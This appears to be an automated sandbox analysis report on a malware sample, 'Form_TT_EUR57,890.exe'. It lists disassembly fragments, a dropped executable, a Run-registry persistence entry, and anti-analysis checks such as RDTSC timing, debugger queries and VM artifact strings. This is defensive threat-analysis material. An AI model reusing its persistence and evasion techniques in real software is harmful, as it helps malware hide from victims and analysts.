          Source: Binary string: mshta.pdb source: rundll32.exe, 0000001C.00000002.865904880.00000000051C7000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.411546423.0000000007BA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88AAC push 0040FD9Ch; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C7C2AC push eax; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88AA5 push 0040FD9Ch; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88A53 push 0040FD65h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88A54 push 0040FD65h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C7F258 push 00406548h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C7F21E push 00406510h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C7F220 push 00406510h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8D230 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8EBDC push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8C3FF push 00413707h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8DB48 push 00414E38h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8DB46 push 00414E38h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C888DC push 0040FC48h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8E8E4 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C858FE push 0040CBF0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C85858 push 0040CB8Bh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C85856 push 0040CB8Bh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88864 push 0040FB9Eh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C889F0 push 0040FCE0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C88986 push 0040FCE0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8F168 push 004164BEh; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C85900 push 0040CBF0h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C85938 push 0040CC28h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C86138 push 0040D428h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C856D8 push 0040CB18h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8BE72 push 004131E3h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8BE74 push 004131E3h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8BFCF push 004132D7h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8BFD0 push 004132D7h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C7F7F8 push 00406AE8h; ret
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeFile created: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeJump to dropped file
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FdhlajkJump to behavior
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FdhlajkJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeRDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mshta.exeRDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mshta.exeRDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000B885E4 second address: 0000000000B885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\secinit.exeRDTSC instruction interceptor: First address: 00000000104185E4 second address: 00000000104185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 0000000000B8897E second address: 0000000000B88984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\secinit.exeRDTSC instruction interceptor: First address: 000000001041897E second address: 0000000010418984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000029485E4 second address: 00000000029485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000294897E second address: 0000000002948984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A6DE6 rdtsc
          Source: C:\Windows\explorer.exe TID: 6064Thread sleep time: -95000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000008.00000000.413920977.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000008.00000000.402875441.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bk?
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B&9]
          Source: explorer.exe, 00000008.00000000.402875441.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.414955487.0000000008540000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA-
          Source: explorer.exe, 00000008.00000000.414996471.0000000008550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 00000008.00000000.413126588.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000008.00000000.413126588.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000008.00000000.413920977.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000008.00000000.468015221.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000008.00000000.400447789.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\logagent.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mshta.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\secinit.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A6DE6 rdtsc
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8F0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8F120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exeCode function: 1_3_02C8E480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04962D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04994D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04973D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04984120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04987D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1B260 mov eax, dword ptr fs:[00000030h]
